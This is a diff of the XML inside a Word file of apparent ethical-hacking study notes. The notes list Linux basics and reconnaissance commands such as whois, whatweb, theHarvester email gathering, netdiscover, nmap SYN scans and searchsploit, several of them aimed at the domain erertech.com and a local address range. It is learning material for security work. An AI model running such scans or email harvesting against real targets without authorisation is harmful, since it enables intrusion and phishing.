-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+              <w:t xml:space="preserve">Google it if </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>theres</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> already existing exploitation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="720"/>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Nessus Installation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Vulnerability Assessment</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Exploitation &amp; Gaining Access</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -90,7 +90,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -101,14 +100,7 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">open port 80, </w:t>
+              <w:t xml:space="preserve">(open port 80, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -236,112 +228,95 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>sudo ifconfig</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>1. Do we have permission to attack?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>pwd – current directory</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>cd - directory</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>M</w:t>
+            </w:r>
+            <w:r>
+              <w:t>kdir</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – add folder</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>rm</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ifconfig</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>1. Do we have permission to attack?</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – current directory</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>cd - directory</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>M</w:t>
-            </w:r>
-            <w:r>
-              <w:t>kdir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – add folder</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>rm</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
             <w:r>
               <w:t>–</w:t>
             </w:r>
@@ -504,46 +479,25 @@
               <w:t xml:space="preserve">mv </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">– to move </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>file{</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>mv file3.py FOLDERNAME}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – ROOT USER</w:t>
+              <w:t>– to move file{mv file3.py FOLDERNAME}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>sudo su – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -716,19 +670,11 @@
                 <w:highlight w:val="green"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Ping(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>)</w:t>
+              <w:t>Ping()</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -745,19 +691,11 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> erertech.com</w:t>
+              <w:t>Nglookup erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -768,7 +706,6 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -781,7 +718,6 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -812,13 +748,8 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> erertech.com -v</w:t>
+            <w:r>
+              <w:t>Whatweb erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -853,7 +784,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -866,7 +796,6 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -886,7 +815,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -897,9 +825,45 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>hatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve">hatweb </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>erertech.com</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -v</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>whatweb 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>.168.1.4-192.168.1.255</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -910,49 +874,80 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>erertech.com</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -v</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 192</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>.168.1.4-192.168.1.255</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t>–no</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>error</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Tool: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Getting email using </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>the Harvester &amp; hunger.io</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
@@ -961,80 +956,16 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>–no</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
               <w:t>-</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>error</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Tool: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Getting email using </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>the Harvester &amp; hunger.io</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
@@ -1043,16 +974,53 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-b all</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-hunter.io</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1063,77 +1031,6 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>help</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -d erertech.com </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-b all</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-hunter.io</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
               <w:sym w:font="Wingdings" w:char="F0DF"/>
             </w:r>
             <w:r>
@@ -1152,11 +1049,9 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>Redhawk(</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:t>software tools</w:t>
             </w:r>
@@ -1176,23 +1071,13 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt install python-pip</w:t>
+            <w:r>
+              <w:t>Sudo apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1452,31 +1337,13 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>netdiscover</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo netdiscover</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1547,7 +1414,6 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -1555,11 +1421,7 @@
               <w:t>Nmap</w:t>
             </w:r>
             <w:r>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>Checking PORTS)</w:t>
+              <w:t>(Checking PORTS)</w:t>
             </w:r>
             <w:r>
               <w:t>- Sometimes it takes hours to scan.</w:t>
@@ -1576,15 +1438,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">You </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>have to</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> put </w:t>
+              <w:t xml:space="preserve">You have to put </w:t>
             </w:r>
             <w:r>
               <w:t>this</w:t>
@@ -1711,17 +1565,63 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Nmap -sS {IPADDRESS}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – </w:t>
+            </w:r>
+            <w:r>
+              <w:t>never full connection</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:t>SYN</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> connection – better use</w:t>
+            </w:r>
+            <w:r>
+              <w:t>!</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
